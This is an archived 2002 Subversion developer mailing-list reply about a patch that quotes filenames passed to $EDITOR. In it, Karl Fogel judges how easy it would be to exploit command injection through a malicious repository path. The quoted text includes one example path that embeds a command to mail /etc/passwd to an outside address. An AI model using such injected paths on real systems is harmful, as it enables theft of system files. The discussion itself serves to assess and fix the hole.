Re: [PATCH] Quote filename passed to $EDITOR

From: Karl Fogel <kfogel_at_newton.ch.collab.net>
Date: 2002-07-23 22:17:24 CEST

Ulrich Drepper <drepper@redhat.com> writes:
> A svn repository can be set up by somebody with foul intentions.
> Somebody else accesses it and the system() call gets executed on the
> paths chosen by whoever created it. Then the patch could be something
> like in this example:
>
> cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)
>
> If the appropriate path component is never really shown anywhere this
> might go completely unnoticed.

Yeah, but the victim would have to fail to notice the strange path.
Remember, the path is on the command line they're invoking -- so the
relevant path component *is* shown before they run the commit command.

I'm not saying it's not a hole, it's just a difficult one to exploit,
as it requires gross inattention on the part of the user. That's why
I'm not viewing it as a showstopper, is all.

-K

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@subversion.tigris.org
For additional commands, e-mail: dev-help@subversion.tigris.org
Received on Tue Jul 23 22:30:50 2002

This message: [ Message body ]
Next message: Karl Fogel: "Re: HTTP authentication vs. --username and --password"
Previous message: Branko Čibej: "Re: Subversion repos going down for upgrade in 5 minutes."
In reply to: Ulrich Drepper: "Re: [PATCH] Quote filename passed to $EDITOR"
Next in thread: Marcus Comstedt: "[PATCH] Re: [PATCH] Quote filename passed to $EDITOR"
Reply: Marcus Comstedt: "[PATCH] Re: [PATCH] Quote filename passed to $EDITOR"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]